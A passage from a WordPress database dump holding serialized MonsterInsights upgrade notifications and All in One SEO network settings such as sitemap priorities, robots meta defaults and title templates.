am\";s:3:\"end\";s:10:\"11/18/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:28;a:10:{s:2:\"id\";s:73:\"monsterinsights_notification_upgrade_for_popular_posts_templates_20221021\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:30:\"Upgrade to MonsterInsights Pro\";s:7:\"content\";s:125:\"Upgrade MonsterInsights Pro and use up to 20+ Popular Post templates to help improve engagement and interaction on your site.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:153:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/21/2022 5:03 am\";s:3:\"end\";s:10:\"11/08/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:29;a:10:{s:2:\"id\";s:66:\"monsterinsights_notification_upgrade_for_events_reporting_20250401\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:30:\"Upgrade to MonsterInsights Pro\";s:7:\"content\";s:105:\"Upgrade to MonsterInsights Pro to see which content and events your visitors are performing in real time.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"04/01/2025 11:55 am\";s:3:\"end\";s:10:\"04/19/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:30;a:10:{s:2:\"id\";s:73:\"monsterinsights_notification_upgrade_for_popular_posts_templates_20251022\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:30:\"Upgrade to MonsterInsights Pro\";s:7:\"content\";s:125:\"Upgrade MonsterInsights Pro and use up to 20+ Popular Post templates to help improve engagement and interaction on your site.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/22/2025 2:15 am\";s:3:\"end\";s:10:\"11/09/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:31;a:10:{s:2:\"id\";s:65:\"monsterinsights_notification_upgrade_for_email_summaries_20251022\";s:4:\"icon\";s:7:\"warning\";s:5:\"title\";s:24:\"Get Weekly Email Reports\";s:7:\"content\";s:616:\"Wouldn’t it be easy if you could get your website’s performance report in your email inbox every week? With Email Summaries, you can view all your important stats in a simple report that’s delivered straight to your inbox. <br><br>You get an overview of your site\'s performance without logging in to WordPress or going through different analytics reports. <a href=\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">Upgrade to MonsterInsights Pro</a> to enable the Email Summaries feature.\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/22/2025 6:26 am\";s:3:\"end\";s:10:\"11/19/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:32;a:10:{s:2:\"id\";s:65:\"monsterinsights_notification_upgrade_for_form_conversion_20250401\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:29:\"Easily Track Form Conversions\";s:7:\"content\";s:264:\"Track your website\'s form conversion rates by upgrading to <a href=\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">MonsterInsights Pro</a>.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:11:\"Upgrade Now\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"04/01/2025 11:56 am\";s:3:\"end\";s:10:\"04/19/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:33;a:10:{s:2:\"id\";s:52:\"monsterinsights_notification_upgrade_to_pro_20251022\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:45:\"Upgrade to Unlock Advanced Tracking & Reports\";s:7:\"content\";s:197:\"By upgrading to MonsterInsights Pro you get access to additional reports right in your WordPress dashboard and advanced tracking features like eCommerce, Custom Dimensions, Forms tracking and more!\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:4:\"btns\";a:1:{s:14:\"upgrade_to_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:14:\"Upgrade to Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/22/2025 2:13 am\";s:3:\"end\";s:10:\"11/29/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:34;a:10:{s:2:\"id\";s:66:\"monsterinsights_notification_upgrade_for_events_reporting_20251022\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:30:\"Upgrade to MonsterInsights Pro\";s:7:\"content\";s:105:\"Upgrade to MonsterInsights Pro to see which content and events your visitors are performing in real time.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/22/2025 2:15 am\";s:3:\"end\";s:10:\"11/09/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:35;a:10:{s:2:\"id\";s:65:\"monsterinsights_notification_upgrade_for_google_optimize_20250401\";s:4:\"icon\";s:7:\"warning\";s:5:\"title\";s:21:\"A/B Test Your Website\";s:7:\"content\";s:773:\"<a href=\"https://www.monsterinsights.com/addon/google-optimize/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">Google Optimize</a> is a free A/B testing and personalization product by Google that lets you easily conduct experiments to see what content, images, and layouts work best on your site. With Google Optimize, you can use split testing and personalization to create online experiences that engage and delight your customers. <a href=\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">Upgrade to MonsterInsights Pro</a> to unlock the Google Optimize addon.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"04/01/2025 11:58 am\";s:3:\"end\";s:10:\"04/29/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:36;a:10:{s:2:\"id\";s:71:\"monsterinsights_notification_upgrade_for_search_console_report_20221021\";s:4:\"icon\";s:7:\"warning\";s:5:\"title\";s:27:\"See Top Performing Keywords\";s:7:\"content\";s:308:\"<a href=\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\" target=\"_blank\">Upgrade to MonsterInsights Pro</a> to see which keywords are driving traffic to your website so you can focus on what\'s working.\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:153:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:11:\"Upgrade Now\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/21/2022 5:05 am\";s:3:\"end\";s:10:\"11/18/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:37;a:10:{s:2:\"id\";s:65:\"monsterinsights_notification_upgrade_for_form_conversion_20221021\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:29:\"Easily Track Form Conversions\";s:7:\"content\";s:263:\"Track your website\'s form conversion rates by upgrading to <a href=\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\" target=\"_blank\">MonsterInsights Pro</a>.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:153:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:11:\"Upgrade Now\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/21/2022 5:05 am\";s:3:\"end\";s:10:\"11/08/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:38;a:10:{s:2:\"id\";s:65:\"monsterinsights_notification_upgrade_for_form_conversion_20251022\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:29:\"Easily Track Form Conversions\";s:7:\"content\";s:264:\"Track your website\'s form conversion rates by upgrading to <a href=\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">MonsterInsights Pro</a>.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:11:\"Upgrade Now\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/22/2025 6:24 am\";s:3:\"end\";s:10:\"11/09/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:39;a:10:{s:2:\"id\";s:55:\"monsterinsights_notification_headline_analyzer_20221021\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:56:\"Try the Headline Analyzer to Boost Your Clicks & Traffic\";s:7:\"content\";s:375:\"Try the <a href=\"https://www.monsterinsights.com/announcing-monsterinsights-new-headline-analyzer/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\" target=\"_blank\">MonsterInsights Headline Analyzer</a> tool. We built it to help increase engagement and make your content get more traffic from search engines.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:10:\"learn_more\";a:3:{s:3:\"url\";s:166:\"https://www.monsterinsights.com/headline-analyzer/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:10:\"Learn More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/21/2022 5:11 am\";s:3:\"end\";s:10:\"12/18/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:40;a:10:{s:2:\"id\";s:66:\"monsterinsights_notification_upgrade_for_events_reporting_20221021\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:30:\"Upgrade to MonsterInsights Pro\";s:7:\"content\";s:105:\"Upgrade to MonsterInsights Pro to see which content and events your visitors are performing in real time.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:153:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/21/2022 5:04 am\";s:3:\"end\";s:10:\"11/08/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:41;a:10:{s:2:\"id\";s:71:\"monsterinsights_notification_upgrade_for_search_console_report_20250401\";s:4:\"icon\";s:7:\"warning\";s:5:\"title\";s:27:\"See Top Performing Keywords\";s:7:\"content\";s:309:\"<a href=\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">Upgrade to MonsterInsights Pro</a> to see which keywords are driving traffic to your website so you can focus on what\'s working.\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:11:\"Upgrade Now\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"04/01/2025 11:55 am\";s:3:\"end\";s:10:\"04/29/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:42;a:10:{s:2:\"id\";s:73:\"monsterinsights_notification_upgrade_for_popular_posts_templates_20250401\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:30:\"Upgrade to MonsterInsights Pro\";s:7:\"content\";s:125:\"Upgrade MonsterInsights Pro and use up to 20+ Popular Post templates to help improve engagement and interaction on your site.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"04/01/2025 11:55 am\";s:3:\"end\";s:10:\"04/19/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:43;a:10:{s:2:\"id\";s:55:\"monsterinsights_notification_headline_analyzer_20251022\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:56:\"Try the Headline Analyzer to Boost Your Clicks & Traffic\";s:7:\"content\";s:376:\"Try the <a href=\"https://www.monsterinsights.com/announcing-monsterinsights-new-headline-analyzer/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">MonsterInsights Headline Analyzer</a> tool. We built it to help increase engagement and make your content get more traffic from search engines.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:10:\"learn_more\";a:3:{s:3:\"url\";s:167:\"https://www.monsterinsights.com/headline-analyzer/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:10:\"Learn More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/22/2025 6:29 am\";s:3:\"end\";s:10:\"12/19/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:44;a:10:{s:2:\"id\";s:55:\"monsterinsights_notification_headline_analyzer_20250401\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:56:\"Try the Headline Analyzer to Boost Your Clicks & Traffic\";s:7:\"content\";s:376:\"Try the <a href=\"https://www.monsterinsights.com/announcing-monsterinsights-new-headline-analyzer/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">MonsterInsights Headline Analyzer</a> tool. We built it to help increase engagement and make your content get more traffic from search engines.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:10:\"learn_more\";a:3:{s:3:\"url\";s:167:\"https://www.monsterinsights.com/headline-analyzer/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:10:\"Learn More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"04/01/2025 11:59 am\";s:3:\"end\";s:10:\"05/29/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:45;a:10:{s:2:\"id\";s:67:\"monsterinsights_notification_upgrade_for_custom_dimensions_20250401\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:30:\"Upgrade to MonsterInsights Pro\";s:7:\"content\";s:177:\"Upgrade to enable Custom Dimensions. Track logged in users, determine when is your best time to post, measure if your SEO strategy is working, and find your most popular author.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"04/01/2025 11:57 am\";s:3:\"end\";s:10:\"04/19/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:46;a:10:{s:2:\"id\";s:52:\"monsterinsights_notification_upgrade_to_pro_20250401\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:45:\"Upgrade to Unlock Advanced Tracking & Reports\";s:7:\"content\";s:197:\"By upgrading to MonsterInsights Pro you get access to additional reports right in your WordPress dashboard and advanced tracking features like eCommerce, Custom Dimensions, Forms tracking and more!\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:4:\"btns\";a:1:{s:14:\"upgrade_to_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:14:\"Upgrade to Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"04/01/2025 11:54 am\";s:3:\"end\";s:10:\"05/09/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:47;a:10:{s:2:\"id\";s:67:\"monsterinsights_notification_upgrade_for_custom_dimensions_20251022\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:30:\"Upgrade to MonsterInsights Pro\";s:7:\"content\";s:177:\"Upgrade to enable Custom Dimensions. Track logged in users, determine when is your best time to post, measure if your SEO strategy is working, and find your most popular author.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/22/2025 6:26 am\";s:3:\"end\";s:10:\"11/09/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:48;a:10:{s:2:\"id\";s:52:\"monsterinsights_notification_upgrade_to_pro_20221021\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:45:\"Upgrade to Unlock Advanced Tracking & Reports\";s:7:\"content\";s:197:\"By upgrading to MonsterInsights Pro you get access to additional reports right in your WordPress dashboard and advanced tracking features like eCommerce, Custom Dimensions, Forms tracking and more!\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:4:\"btns\";a:1:{s:14:\"upgrade_to_pro\";a:3:{s:3:\"url\";s:153:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:14:\"Upgrade to Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/21/2022 4:46 am\";s:3:\"end\";s:10:\"11/28/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}}s:9:\"dismissed\";a:0:{}s:12:\"feed_fetched\";b:1;}','off'),(71241,'wp_attachment_pages_enabled','1','yes'),(67329,'aioseo_options_network_lite','{\"advanced\":{\"usageTracking\":false}}','yes'),(67330,'aioseo_options_dynamic_network','{\"sitemap\":{\"priority\":{\"postTypes\":{\"post\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"page\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"attachment\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"project\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"}},\"taxonomies\":[]}},\"social\":{\"facebook\":{\"general\":{\"postTypes\":{\"post\":{\"objectType\":\"article\"},\"page\":{\"objectType\":\"article\"},\"attachment\":{\"objectType\":\"article\"},\"project\":{\"objectType\":\"article\"}}}}},\"searchAppearance\":{\"postTypes\":{\"post\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"bulkEditing\":\"enabled\"},\"title\":\"#post_title #separator_sa #site_title\",\"metaDescription\":\"#post_excerpt\",\"schemaType\":\"Article\",\"webPageType\":\"WebPage\",\"articleType\":\"BlogPosting\",\"customFields\":null},\"page\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"bulkEditing\":\"enabled\"},\"title\":\"#post_title #separator_sa #site_title\",\"metaDescription\":\"#post_content\",\"schemaType\":\"WebPage\",\"webPageType\":\"WebPage\",\"articleType\":\"BlogPosting\",\"customFields\":null},\"attachment\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"bulkEditing\":\"enabled\"},\"title\":\"#post_title #separator_sa #site_title\",\"metaDescription\":\"#attachment_caption\",\"schemaType\":\"ItemPage\",\"webPageType\":\"ItemPage\",\"articleType\":\"BlogPosting\",\"customFields\":null,\"redirectAttachmentUrls\":\"attachment\"},\"project\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"bulkEditing\":\"enabled\"},\"title\":\"#post_title #separator_sa #site_title\",\"metaDescription\":\"#post_excerpt\",\"schemaType\":\"WebPage\",\"webPageType\":\"WebPage\",\"articleType\":\"BlogPosting\",\"customFields\":null}},\"taxonomies\":{\"category\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"post_tag\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"layout_category\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"layout_pack\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"layout_type\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"scope\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa 